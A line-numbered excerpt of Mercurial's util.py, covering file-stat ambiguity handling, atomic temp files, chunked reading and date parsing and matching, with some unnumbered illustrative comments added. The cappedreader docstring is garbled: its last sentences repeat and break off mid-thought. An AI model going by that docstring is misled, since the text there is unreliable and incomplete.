1596 1818 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1597 1819
1598 1820 def splitpath(path):
1599 1821 '''Split path by os.sep.
1600 1822 Note that this function does not use os.altsep because it is
1601 1823 a simple alternative to "xxx.split(os.sep)".
1602 1824 It is recommended to use os.path.normpath() before using this
1603 1825 function if needed.'''
1604 1826 return path.split(pycompat.ossep)
1605 1827
1606 1828 def gui():
1607 1829 '''Are we running in a GUI?'''
1608 1830 if pycompat.isdarwin:
1609 1831 if 'SSH_CONNECTION' in encoding.environ:
1610 1832 # handle SSH access to a box where the user is logged in
1611 1833 return False
1612 1834 elif getattr(osutil, 'isgui', None):
1613 1835 # check if a CoreGraphics session is available
1614 1836 return osutil.isgui()
1615 1837 else:
1616 1838 # pure build; use a safe default
1617 1839 return True
1618 1840 else:
1619 1841 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1620 1842
1621 1843 def mktempcopy(name, emptyok=False, createmode=None):
1622 1844 """Create a temporary file with the same contents from name
1623 1845
1624 1846 The permission bits are copied from the original file.
1625 1847
1626 1848 If the temporary file is going to be truncated immediately, you
1627 1849 can use emptyok=True as an optimization.
1628 1850
1629 1851 Returns the name of the temporary file.
1630 1852 """
1631 1853 d, fn = os.path.split(name)
1632 1854 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1633 1855 os.close(fd)
1634 1856 # Temporary files are created with mode 0600, which is usually not
1635 1857 # what we want. If the original file already exists, just copy
1636 1858 # its mode. Otherwise, manually obey umask.
1637 1859 copymode(name, temp, createmode)
1638 1860 if emptyok:
1639 1861 return temp
1640 1862 try:
1641 1863 try:
1642 1864 ifp = posixfile(name, "rb")
1643 1865 except IOError as inst:
1644 1866 if inst.errno == errno.ENOENT:
1645 1867 return temp
1646 1868 if not getattr(inst, 'filename', None):
1647 1869 inst.filename = name
1648 1870 raise
1649 1871 ofp = posixfile(temp, "wb")
1650 1872 for chunk in filechunkiter(ifp):
1651 1873 ofp.write(chunk)
1652 1874 ifp.close()
1653 1875 ofp.close()
1654 1876 except: # re-raises
1655 1877 try:
1656 1878 os.unlink(temp)
1657 1879 except OSError:
1658 1880 pass
1659 1881 raise
1660 1882 return temp
1661 1883
1662 1884 class filestat(object):
1663 1885 """help to exactly detect change of a file
1664 1886
1665 1887 'stat' attribute is result of 'os.stat()' if specified 'path'
1666 1888 exists. Otherwise, it is None. This can avoid preparative
1667 1889 'exists()' examination on client side of this class.
1668 1890 """
1669 1891 def __init__(self, stat):
1670 1892 self.stat = stat
1671 1893
1672 1894 @classmethod
1673 1895 def frompath(cls, path):
1674 1896 try:
1675 1897 stat = os.stat(path)
1676 1898 except OSError as err:
1677 1899 if err.errno != errno.ENOENT:
1678 1900 raise
1679 1901 stat = None
1680 1902 return cls(stat)
1681 1903
1682 1904 @classmethod
1683 1905 def fromfp(cls, fp):
1684 1906 stat = os.fstat(fp.fileno())
1685 1907 return cls(stat)
1686 1908
1687 1909 __hash__ = object.__hash__
1688 1910
1689 1911 def __eq__(self, old):
1690 1912 try:
1691 1913 # if ambiguity between stat of new and old file is
1692 1914 # avoided, comparison of size, ctime and mtime is enough
1693 1915 # to exactly detect change of a file regardless of platform
1694 1916 return (self.stat.st_size == old.stat.st_size and
1695 1917 self.stat.st_ctime == old.stat.st_ctime and
1696 1918 self.stat.st_mtime == old.stat.st_mtime)
1697 1919 except AttributeError:
1698 1920 pass
1699 1921 try:
1700 1922 return self.stat is None and old.stat is None
1701 1923 except AttributeError:
1702 1924 return False
1703 1925
1704 1926 def isambig(self, old):
1705 1927 """Examine whether new (= self) stat is ambiguous against old one
1706 1928
1707 1929 "S[N]" below means stat of a file at N-th change:
1708 1930
1709 1931 - S[n-1].ctime < S[n].ctime: can detect change of a file
1710 1932 - S[n-1].ctime == S[n].ctime
1711 1933 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1712 1934 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1713 1935 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1714 1936 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1715 1937
1716 1938 Case (*2) above means that a file was changed twice or more
1717 1939 within the same second (= S[n-1].ctime), so comparison of
1718 1940 timestamps is ambiguous.
1719 1941
1720 1942 The basic idea to avoid such ambiguity is "advance mtime by 1
1721 1943 second, if the timestamp is ambiguous".
1722 1944
1723 1945 But advancing mtime only in case (*2) doesn't work as
1724 1946 expected, because a naturally advanced S[n].mtime in case (*1)
1725 1947 might equal a manually advanced S[n-1 or earlier].mtime.
1726 1948
1727 1949 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1728 1950 treated as ambiguous regardless of mtime, to avoid overlooking
1729 1951 a change because of a collision between such mtimes.
1730 1952
1731 1953 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1732 1954 S[n].mtime", even if size of a file isn't changed.
1733 1955 """
1734 1956 try:
1735 1957 return (self.stat.st_ctime == old.stat.st_ctime)
1736 1958 except AttributeError:
1737 1959 return False
1738 1960
1739 1961 def avoidambig(self, path, old):
1740 1962 """Change file stat of specified path to avoid ambiguity
1741 1963
1742 1964 'old' should be previous filestat of 'path'.
1743 1965
1744 1966 This skips avoiding ambiguity, if a process doesn't have
1745 1967 appropriate privileges for 'path'. This returns False in this
1746 1968 case.
1747 1969
1748 1970 Otherwise, this returns True, as "ambiguity is avoided".
1749 1971 """
1750 1972 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1751 1973 try:
1752 1974 os.utime(path, (advanced, advanced))
1753 1975 except OSError as inst:
1754 1976 if inst.errno == errno.EPERM:
1755 1977 # utime() on the file created by another user causes EPERM,
1756 1978 # if a process doesn't have appropriate privileges
1757 1979 return False
1758 1980 raise
1759 1981 return True
1760 1982
1761 1983 def __ne__(self, other):
1762 1984 return not self == other
1763 1985
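# Worked example (illustrative, not part of this module): if a file is
# written twice within one second, size/ctime/mtime may all match and the
# second write would go undetected by filestat.__eq__. avoidambig() bumps
# mtime so the two generations stay distinguishable:
#
#   old = filestat.frompath(path)   # taken after the first write
#   # ... second write lands within the same second ...
#   new = filestat.frompath(path)
#   if new.isambig(old):
#       new.avoidambig(path, old)   # mtime := (old mtime + 1) & 0x7fffffff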
1764 1986 class atomictempfile(object):
1765 1987 '''writable file object that atomically updates a file
1766 1988
1767 1989 All writes will go to a temporary copy of the original file. Call
1768 1990 close() when you are done writing, and atomictempfile will rename
1769 1991 the temporary copy to the original name, making the changes
1770 1992 visible. If the object is destroyed without being closed, all your
1771 1993 writes are discarded.
1772 1994
1773 1995 checkambig argument of constructor is used with filestat, and is
1774 1996 useful only if target file is guarded by any lock (e.g. repo.lock
1775 1997 or repo.wlock).
1776 1998 '''
1777 1999 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1778 2000 self.__name = name # permanent name
1779 2001 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1780 2002 createmode=createmode)
1781 2003 self._fp = posixfile(self._tempname, mode)
1782 2004 self._checkambig = checkambig
1783 2005
1784 2006 # delegated methods
1785 2007 self.read = self._fp.read
1786 2008 self.write = self._fp.write
1787 2009 self.seek = self._fp.seek
1788 2010 self.tell = self._fp.tell
1789 2011 self.fileno = self._fp.fileno
1790 2012
1791 2013 def close(self):
1792 2014 if not self._fp.closed:
1793 2015 self._fp.close()
1794 2016 filename = localpath(self.__name)
1795 2017 oldstat = self._checkambig and filestat.frompath(filename)
1796 2018 if oldstat and oldstat.stat:
1797 2019 rename(self._tempname, filename)
1798 2020 newstat = filestat.frompath(filename)
1799 2021 if newstat.isambig(oldstat):
1800 2022 # stat of changed file is ambiguous to original one
1801 2023 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1802 2024 os.utime(filename, (advanced, advanced))
1803 2025 else:
1804 2026 rename(self._tempname, filename)
1805 2027
1806 2028 def discard(self):
1807 2029 if not self._fp.closed:
1808 2030 try:
1809 2031 os.unlink(self._tempname)
1810 2032 except OSError:
1811 2033 pass
1812 2034 self._fp.close()
1813 2035
1814 2036 def __del__(self):
1815 2037 if safehasattr(self, '_fp'): # constructor actually did something
1816 2038 self.discard()
1817 2039
1818 2040 def __enter__(self):
1819 2041 return self
1820 2042
1821 2043 def __exit__(self, exctype, excvalue, traceback):
1822 2044 if exctype is not None:
1823 2045 self.discard()
1824 2046 else:
1825 2047 self.close()
1826 2048
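# Illustrative usage sketch (the file name is hypothetical): atomictempfile
# is normally used as a context manager, so readers never observe a
# partially written file:
#
#   with atomictempfile(b'requires', mode='wb') as fp:
#       fp.write(b'dotencode\nfncache\n')
#
# On a clean exit the temporary copy is rename()d over b'requires'; on an
# exception it is discarded and the original file is left untouched.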
1827 2049 def unlinkpath(f, ignoremissing=False):
1828 2050 """unlink and remove the directory if it is empty"""
1829 2051 if ignoremissing:
1830 2052 tryunlink(f)
1831 2053 else:
1832 2054 unlink(f)
1833 2055 # try removing directories that might now be empty
1834 2056 try:
1835 2057 removedirs(os.path.dirname(f))
1836 2058 except OSError:
1837 2059 pass
1838 2060
1839 2061 def tryunlink(f):
1840 2062 """Attempt to remove a file, ignoring ENOENT errors."""
1841 2063 try:
1842 2064 unlink(f)
1843 2065 except OSError as e:
1844 2066 if e.errno != errno.ENOENT:
1845 2067 raise
1846 2068
1847 2069 def makedirs(name, mode=None, notindexed=False):
1848 2070 """recursive directory creation with parent mode inheritance
1849 2071
1850 2072 Newly created directories are marked as "not to be indexed by
1851 2073 the content indexing service", if ``notindexed`` is specified
1852 2074 for "write" mode access.
1853 2075 """
1854 2076 try:
1855 2077 makedir(name, notindexed)
1856 2078 except OSError as err:
1857 2079 if err.errno == errno.EEXIST:
1858 2080 return
1859 2081 if err.errno != errno.ENOENT or not name:
1860 2082 raise
1861 2083 parent = os.path.dirname(os.path.abspath(name))
1862 2084 if parent == name:
1863 2085 raise
1864 2086 makedirs(parent, mode, notindexed)
1865 2087 try:
1866 2088 makedir(name, notindexed)
1867 2089 except OSError as err:
1868 2090 # Catch EEXIST to handle races
1869 2091 if err.errno == errno.EEXIST:
1870 2092 return
1871 2093 raise
1872 2094 if mode is not None:
1873 2095 os.chmod(name, mode)
1874 2096
1875 2097 def readfile(path):
1876 2098 with open(path, 'rb') as fp:
1877 2099 return fp.read()
1878 2100
1879 2101 def writefile(path, text):
1880 2102 with open(path, 'wb') as fp:
1881 2103 fp.write(text)
1882 2104
1883 2105 def appendfile(path, text):
1884 2106 with open(path, 'ab') as fp:
1885 2107 fp.write(text)
1886 2108
1887 2109 class chunkbuffer(object):
1888 2110 """Allow arbitrary sized chunks of data to be efficiently read from an
1889 2111 iterator over chunks of arbitrary size."""
1890 2112
1891 2113 def __init__(self, in_iter):
1892 2114 """in_iter is the iterator that's iterating over the input chunks."""
1893 2115 def splitbig(chunks):
1894 2116 for chunk in chunks:
1895 2117 if len(chunk) > 2**20:
1896 2118 pos = 0
1897 2119 while pos < len(chunk):
1898 2120 end = pos + 2 ** 18
1899 2121 yield chunk[pos:end]
1900 2122 pos = end
1901 2123 else:
1902 2124 yield chunk
1903 2125 self.iter = splitbig(in_iter)
1904 2126 self._queue = collections.deque()
1905 2127 self._chunkoffset = 0
1906 2128
1907 2129 def read(self, l=None):
1908 2130 """Read L bytes of data from the iterator of chunks of data.
1909 2131 Returns less than L bytes if the iterator runs dry.
1910 2132
1911 2133 If the size parameter is omitted, read everything."""
1912 2134 if l is None:
1913 2135 return ''.join(self.iter)
1914 2136
1915 2137 left = l
1916 2138 buf = []
1917 2139 queue = self._queue
1918 2140 while left > 0:
1919 2141 # refill the queue
1920 2142 if not queue:
1921 2143 target = 2**18
1922 2144 for chunk in self.iter:
1923 2145 queue.append(chunk)
1924 2146 target -= len(chunk)
1925 2147 if target <= 0:
1926 2148 break
1927 2149 if not queue:
1928 2150 break
1929 2151
1930 2152 # The easy way to do this would be to queue.popleft(), modify the
1931 2153 # chunk (if necessary), then queue.appendleft(). However, for cases
1932 2154 # where we read partial chunk content, this incurs 2 dequeue
1933 2155 # mutations and creates a new str for the remaining chunk in the
1934 2156 # queue. Our code below avoids this overhead.
1935 2157
1936 2158 chunk = queue[0]
1937 2159 chunkl = len(chunk)
1938 2160 offset = self._chunkoffset
1939 2161
1940 2162 # Use full chunk.
1941 2163 if offset == 0 and left >= chunkl:
1942 2164 left -= chunkl
1943 2165 queue.popleft()
1944 2166 buf.append(chunk)
1945 2167 # self._chunkoffset remains at 0.
1946 2168 continue
1947 2169
1948 2170 chunkremaining = chunkl - offset
1949 2171
1950 2172 # Use all of unconsumed part of chunk.
1951 2173 if left >= chunkremaining:
1952 2174 left -= chunkremaining
1953 2175 queue.popleft()
1954 2176 # offset == 0 is enabled by block above, so this won't merely
1955 2177 # copy via ``chunk[0:]``.
1956 2178 buf.append(chunk[offset:])
1957 2179 self._chunkoffset = 0
1958 2180
1959 2181 # Partial chunk needed.
1960 2182 else:
1961 2183 buf.append(chunk[offset:offset + left])
1962 2184 self._chunkoffset += left
1963 2185 left -= chunkremaining
1964 2186
1965 2187 return ''.join(buf)
1966 2188
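# Illustrative usage sketch (not part of this module): chunkbuffer lets a
# consumer read fixed-size records from arbitrarily sized input chunks:
#
#   buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
#   buf.read(3)   # -> b'abc'
#   buf.read(3)   # -> b'def'
#   buf.read(3)   # -> b'g' (input exhausted: fewer bytes are returned)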
1967 2189 def filechunkiter(f, size=131072, limit=None):
1968 2190 """Create a generator that produces the data in the file,
1969 2191 size (default 131072) bytes at a time, up to an optional limit (default is
1970 2192 to read all data). Chunks may be less than size bytes if the
1971 2193 chunk is the last chunk in the file, or the file is a socket or
1972 2194 some other type of file that sometimes reads less data than is
1973 2195 requested."""
1974 2196 assert size >= 0
1975 2197 assert limit is None or limit >= 0
1976 2198 while True:
1977 2199 if limit is None:
1978 2200 nbytes = size
1979 2201 else:
1980 2202 nbytes = min(limit, size)
1981 2203 s = nbytes and f.read(nbytes)
1982 2204 if not s:
1983 2205 break
1984 2206 if limit:
1985 2207 limit -= len(s)
1986 2208 yield s
1987 2209
1988 2210 class cappedreader(object):
1989 2211 """A file object proxy that allows reading up to N bytes.
1990 2212
1991 2213 Given a source file object, instances of this type allow reading up to
1992 2214 N bytes from that source file object. Attempts to read past the allowed
1993 2215 limit are treated as EOF.
1994 2216
1995 2217 It is assumed that I/O is not performed on the original file object
1996 2218 in addition to I/O that is performed by this instance. If there is,
1997 2219 in addition to I/O that is performed by this instance. If it is,
1998 2220 """
1999 2221 def __init__(self, fh, limit):
2000 2222 """Allow reading up to <limit> bytes from <fh>."""
2001 2223 self._fh = fh
2002 2224 self._left = limit
2003 2225
2004 2226 def read(self, n=-1):
2005 2227 if not self._left:
2006 2228 return b''
2007 2229
2008 2230 if n < 0:
2009 2231 n = self._left
2010 2232
2011 2233 data = self._fh.read(min(n, self._left))
2012 2234 self._left -= len(data)
2013 2235 assert self._left >= 0
2014 2236
2015 2237 return data
2016 2238
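# Illustrative usage sketch (not part of this module): cappedreader makes a
# length-prefixed region of a stream look like a small file of its own:
#
#   import io
#   fh = io.BytesIO(b'headerpayloadtrailer')
#   fh.seek(6)                # position at the start of b'payload'
#   reader = cappedreader(fh, 7)
#   reader.read()             # -> b'payload'
#   reader.read()             # -> b'' (limit reached, treated as EOF)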
2017 2239 def makedate(timestamp=None):
2018 2240 '''Return a unix timestamp (or the current time) as a (unixtime,
2019 2241 offset) tuple based off the local timezone.'''
2020 2242 if timestamp is None:
2021 2243 timestamp = time.time()
2022 2244 if timestamp < 0:
2023 2245 hint = _("check your clock")
2024 2246 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2025 2247 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2026 2248 datetime.datetime.fromtimestamp(timestamp))
2027 2249 tz = delta.days * 86400 + delta.seconds
2028 2250 return timestamp, tz
2029 2251
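# Illustrative examples (timezone-dependent, hence hedged): the stored
# offset is the number of seconds to add to local time to obtain UTC:
#
#   makedate(0)   # -> (0, 0)      on a host running at UTC
#   makedate(0)   # -> (0, -7200)  on a host running at UTC+2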
2030 2252 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2031 2253 """represent a (unixtime, offset) tuple as a localized time.
2032 2254 unixtime is seconds since the epoch, and offset is the time zone's
2033 2255 number of seconds away from UTC.
2034 2256
2035 2257 >>> datestr((0, 0))
2036 2258 'Thu Jan 01 00:00:00 1970 +0000'
2037 2259 >>> datestr((42, 0))
2038 2260 'Thu Jan 01 00:00:42 1970 +0000'
2039 2261 >>> datestr((-42, 0))
2040 2262 'Wed Dec 31 23:59:18 1969 +0000'
2041 2263 >>> datestr((0x7fffffff, 0))
2042 2264 'Tue Jan 19 03:14:07 2038 +0000'
2043 2265 >>> datestr((-0x80000000, 0))
2044 2266 'Fri Dec 13 20:45:52 1901 +0000'
2045 2267 """
2046 2268 t, tz = date or makedate()
2047 2269 if "%1" in format or "%2" in format or "%z" in format:
2048 2270 sign = (tz > 0) and "-" or "+"
2049 2271 minutes = abs(tz) // 60
2050 2272 q, r = divmod(minutes, 60)
2051 2273 format = format.replace("%z", "%1%2")
2052 2274 format = format.replace("%1", "%c%02d" % (sign, q))
2053 2275 format = format.replace("%2", "%02d" % r)
2054 2276 d = t - tz
2055 2277 if d > 0x7fffffff:
2056 2278 d = 0x7fffffff
2057 2279 elif d < -0x80000000:
2058 2280 d = -0x80000000
2059 2281 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2060 2282 # because they use the gmtime() system call which is buggy on Windows
2061 2283 # for negative values.
2062 2284 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2063 2285 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2064 2286 return s
2065 2287
2066 2288 def shortdate(date=None):
2067 2289 """turn (timestamp, tzoff) tuple into iso 8601 date."""
2068 2290 return datestr(date, format='%Y-%m-%d')
2069 2291
2070 2292 def parsetimezone(s):
2071 2293 """find a trailing timezone, if any, in string, and return a
2072 2294 (offset, remainder) pair"""
2073 2295
2074 2296 if s.endswith("GMT") or s.endswith("UTC"):
2075 2297 return 0, s[:-3].rstrip()
2076 2298
2077 2299 # Unix-style timezones [+-]hhmm
2078 2300 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2079 2301 sign = (s[-5] == "+") and 1 or -1
2080 2302 hours = int(s[-4:-2])
2081 2303 minutes = int(s[-2:])
2082 2304 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2083 2305
2084 2306 # ISO8601 trailing Z
2085 2307 if s.endswith("Z") and s[-2:-1].isdigit():
2086 2308 return 0, s[:-1]
2087 2309
2088 2310 # ISO8601-style [+-]hh:mm
2089 2311 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2090 2312 s[-5:-3].isdigit() and s[-2:].isdigit()):
2091 2313 sign = (s[-6] == "+") and 1 or -1
2092 2314 hours = int(s[-5:-3])
2093 2315 minutes = int(s[-2:])
2094 2316 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2095 2317
2096 2318 return None, s
2097 2319
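# Illustrative examples (not part of this module): parsetimezone peels a
# trailing timezone off a date string and leaves the rest for strptime:
#
#   parsetimezone(b'Apr 5 15:40 +0300')   # -> (-10800, b'Apr 5 15:40')
#   parsetimezone(b'Apr 5 15:40 GMT')     # -> (0, b'Apr 5 15:40')
#   parsetimezone(b'Apr 5 15:40')         # -> (None, b'Apr 5 15:40')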
2098 2320 def strdate(string, format, defaults=None):
2099 2321 """parse a localized time string and return a (unixtime, offset) tuple.
2100 2322 if the string cannot be parsed, ValueError is raised."""
2101 2323 if defaults is None:
2102 2324 defaults = {}
2103 2325
2104 2326 # NOTE: unixtime = localunixtime + offset
2105 2327 offset, date = parsetimezone(string)
2106 2328
2107 2329 # add missing elements from defaults
2108 2330 usenow = False # default to using biased defaults
2109 2331 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2110 2332 part = pycompat.bytestr(part)
2111 2333 found = [True for p in part if ("%"+p) in format]
2112 2334 if not found:
2113 2335 date += "@" + defaults[part][usenow]
2114 2336 format += "@%" + part[0]
2115 2337 else:
2116 2338 # We've found a specific time element; less specific time
2117 2339 # elements are relative to today
2118 2340 usenow = True
2119 2341
2120 2342 timetuple = time.strptime(encoding.strfromlocal(date),
2121 2343 encoding.strfromlocal(format))
2122 2344 localunixtime = int(calendar.timegm(timetuple))
2123 2345 if offset is None:
2124 2346 # local timezone
2125 2347 unixtime = int(time.mktime(timetuple))
2126 2348 offset = unixtime - localunixtime
2127 2349 else:
2128 2350 unixtime = localunixtime + offset
2129 2351 return unixtime, offset
2130 2352
2131 2353 def parsedate(date, formats=None, bias=None):
2132 2354 """parse a localized date/time and return a (unixtime, offset) tuple.
2133 2355
2134 2356 The date may be a "unixtime offset" string or in one of the specified
2135 2357 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2136 2358
2137 2359 >>> parsedate(b' today ') == parsedate(
2138 2360 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2139 2361 True
2140 2362 >>> parsedate(b'yesterday ') == parsedate(
2141 2363 ... (datetime.date.today() - datetime.timedelta(days=1)
2142 2364 ... ).strftime('%b %d').encode('ascii'))
2143 2365 True
2144 2366 >>> now, tz = makedate()
2145 2367 >>> strnow, strtz = parsedate(b'now')
2146 2368 >>> (strnow - now) < 1
2147 2369 True
2148 2370 >>> tz == strtz
2149 2371 True
2150 2372 """
2151 2373 if bias is None:
2152 2374 bias = {}
2153 2375 if not date:
2154 2376 return 0, 0
2155 2377 if isinstance(date, tuple) and len(date) == 2:
2156 2378 return date
2157 2379 if not formats:
2158 2380 formats = defaultdateformats
2159 2381 date = date.strip()
2160 2382
2161 2383 if date == 'now' or date == _('now'):
2162 2384 return makedate()
2163 2385 if date == 'today' or date == _('today'):
2164 2386 date = datetime.date.today().strftime(r'%b %d')
2165 2387 date = encoding.strtolocal(date)
2166 2388 elif date == 'yesterday' or date == _('yesterday'):
2167 2389 date = (datetime.date.today() -
2168 2390 datetime.timedelta(days=1)).strftime(r'%b %d')
2169 2391 date = encoding.strtolocal(date)
2170 2392
2171 2393 try:
2172 2394 when, offset = map(int, date.split(' '))
2173 2395 except ValueError:
2174 2396 # fill out defaults
2175 2397 now = makedate()
2176 2398 defaults = {}
2177 2399 for part in ("d", "mb", "yY", "HI", "M", "S"):
2178 2400 # this piece is for rounding the specific end of unknowns
2179 2401 b = bias.get(part)
2180 2402 if b is None:
2181 2403 if part[0:1] in "HMS":
2182 2404 b = "00"
2183 2405 else:
2184 2406 b = "0"
2185 2407
2186 2408 # this piece is for matching the generic end to today's date
2187 2409 n = datestr(now, "%" + part[0:1])
2188 2410
2189 2411 defaults[part] = (b, n)
2190 2412
2191 2413 for format in formats:
2192 2414 try:
2193 2415 when, offset = strdate(date, format, defaults)
2194 2416 except (ValueError, OverflowError):
2195 2417 pass
2196 2418 else:
2197 2419 break
2198 2420 else:
2199 2421 raise error.ParseError(_('invalid date: %r') % date)
2200 2422 # validate explicit (probably user-specified) date and
2201 2423 # time zone offset. values must fit in signed 32 bits for
2202 2424 # current 32-bit linux runtimes. timezones go from UTC-12
2203 2425 # to UTC+14
2204 2426 if when < -0x80000000 or when > 0x7fffffff:
2205 2427 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2206 2428 if offset < -50400 or offset > 43200:
2207 2429 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2208 2430 return when, offset
2209 2431
2210 2432 def matchdate(date):
2211 2433 """Return a function that matches a given date match specifier
2212 2434
2213 2435 Formats include:
2214 2436
2215 2437 '{date}' match a given date to the accuracy provided
2216 2438
2217 2439 '<{date}' on or before a given date
2218 2440
2219 2441 '>{date}' on or after a given date
2220 2442
2221 2443 >>> p1 = parsedate(b"10:29:59")
2222 2444 >>> p2 = parsedate(b"10:30:00")
2223 2445 >>> p3 = parsedate(b"10:30:59")
2224 2446 >>> p4 = parsedate(b"10:31:00")
2225 2447 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2226 2448 >>> f = matchdate(b"10:30")
2227 2449 >>> f(p1[0])
2228 2450 False
2229 2451 >>> f(p2[0])
2230 2452 True
2231 2453 >>> f(p3[0])
2232 2454 True
2233 2455 >>> f(p4[0])
2234 2456 False
2235 2457 >>> f(p5[0])
2236 2458 False
2237 2459 """
2238 2460
2239 2461 def lower(date):
2240 2462 d = {'mb': "1", 'd': "1"}
2241 2463 return parsedate(date, extendeddateformats, d)[0]
2242 2464
2243 2465 def upper(date):
2244 2466 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2245 2467 for days in ("31", "30", "29"):
2246 2468 try:
2247 2469 d["d"] = days
2248 2470 return parsedate(date, extendeddateformats, d)[0]
2249 2471 except error.ParseError:
2250 2472 pass
2251 2473 d["d"] = "28"
2252 2474 return parsedate(date, extendeddateformats, d)[0]
2253 2475
2254 2476 date = date.strip()
2255 2477
2256 2478 if not date:
2257 2479 raise Abort(_("dates cannot consist entirely of whitespace"))
2258 2480 elif date[0] == "<":
2259 2481 if not date[1:]:
2260 2482 raise Abort(_("invalid day spec, use '<DATE'"))
2261 2483 when = upper(date[1:])
2262 2484 return lambda x: x <= when
2263 2485 elif date[0] == ">":
2264 2486 if not date[1:]:
2265 2487 raise Abort(_("invalid day spec, use '>DATE'"))
2266 2488 when = lower(date[1:])
2267 2489 return lambda x: x >= when
2268 2490 elif date[0] == "-":
2269 2491 try:
2270 2492 days = int(date[1:])
2271 2493 except ValueError:
2272 2494 raise Abort(_("invalid day spec: %s") % date[1:])
2273 2495 if days < 0:
2274 2496 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2275 2497 % date[1:])
2276 2498 when = makedate()[0] - days * 3600 * 24
2277 2499 return lambda x: x >= when
2278 2500 elif " to " in date:
2279 2501 a, b = date.split(" to ")
2280 2502 start, stop = lower(a), upper(b)
2281 2503 return lambda x: x >= start and x <= stop
2282 2504 else:
2283 2505 start, stop = lower(date), upper(date)
2284 2506 return lambda x: x >= start and x <= stop
2285 2507
2286 2508 def stringmatcher(pattern, casesensitive=True):
2287 2509 """
2288 2510 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2289 2511 returns the matcher name, pattern, and matcher function.
2290 2512 missing or unknown prefixes are treated as literal matches.
2291 2513
2292 2514 helper for tests:
2293 2515 >>> def test(pattern, *tests):
2294 2516 ... kind, pattern, matcher = stringmatcher(pattern)
2295 2517 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2296 2518 >>> def itest(pattern, *tests):
2297 2519 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2298 2520 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2299 2521
2300 2522 exact matching (no prefix):
2301 2523 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2302 2524 ('literal', 'abcdefg', [False, False, True])
2303 2525
2304 2526 regex matching ('re:' prefix)
2305 2527 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2306 2528 ('re', 'a.+b', [False, False, True])
2307 2529
2308 2530 force exact matches ('literal:' prefix)
2309 2531 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2310 2532 ('literal', 're:foobar', [False, True])
2311 2533
2312 2534 unknown prefixes are ignored and treated as literals
2313 2535 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2314 2536 ('literal', 'foo:bar', [False, False, True])
2315 2537
2316 2538 case insensitive regex matches
2317 2539 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2318 2540 ('re', 'A.+b', [False, False, True])
2319 2541
2320 2542 case insensitive literal matches
2321 2543 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2322 2544 ('literal', 'ABCDEFG', [False, False, True])
2323 2545 """
2324 2546 if pattern.startswith('re:'):
2325 2547 pattern = pattern[3:]
2326 2548 try:
2327 2549 flags = 0
2328 2550 if not casesensitive:
2329 2551 flags = remod.I
2330 2552 regex = remod.compile(pattern, flags)
2331 2553 except remod.error as e:
2332 2554 raise error.ParseError(_('invalid regular expression: %s')
2333 2555 % e)
2334 2556 return 're', pattern, regex.search
2335 2557 elif pattern.startswith('literal:'):
2336 2558 pattern = pattern[8:]
2337 2559
2338 2560 match = pattern.__eq__
2339 2561
2340 2562 if not casesensitive:
2341 2563 ipat = encoding.lower(pattern)
2342 2564 match = lambda s: ipat == encoding.lower(s)
2343 2565 return 'literal', pattern, match
2344 2566
2345 2567 def shortuser(user):
2346 2568 """Return a short representation of a user name or email address."""
2347 2569 f = user.find('@')
2348 2570 if f >= 0:
2349 2571 user = user[:f]
2350 2572 f = user.find('<')
2351 2573 if f >= 0:
2352 2574 user = user[f + 1:]
2353 2575 f = user.find(' ')
2354 2576 if f >= 0:
2355 2577 user = user[:f]
2356 2578 f = user.find('.')
2357 2579 if f >= 0:
2358 2580 user = user[:f]
2359 2581 return user
2360 2582
2361 2583 def emailuser(user):
2362 2584 """Return the user portion of an email address."""
2363 2585 f = user.find('@')
2364 2586 if f >= 0:
2365 2587 user = user[:f]
2366 2588 f = user.find('<')
2367 2589 if f >= 0:
2368 2590 user = user[f + 1:]
2369 2591 return user
2370 2592
2371 2593 def email(author):
2372 2594 '''get email of author.'''
2373 2595 r = author.find('>')
2374 2596 if r == -1:
2375 2597 r = None
2376 2598 return author[author.find('<') + 1:r]
2377 2599
2378 2600 def ellipsis(text, maxlength=400):
2379 2601 """Trim string to at most maxlength (default: 400) columns in display."""
2380 2602 return encoding.trim(text, maxlength, ellipsis='...')
2381 2603
2382 2604 def unitcountfn(*unittable):
2383 2605 '''return a function that renders a readable count of some quantity'''
2384 2606
2385 2607 def go(count):
2386 2608 for multiplier, divisor, format in unittable:
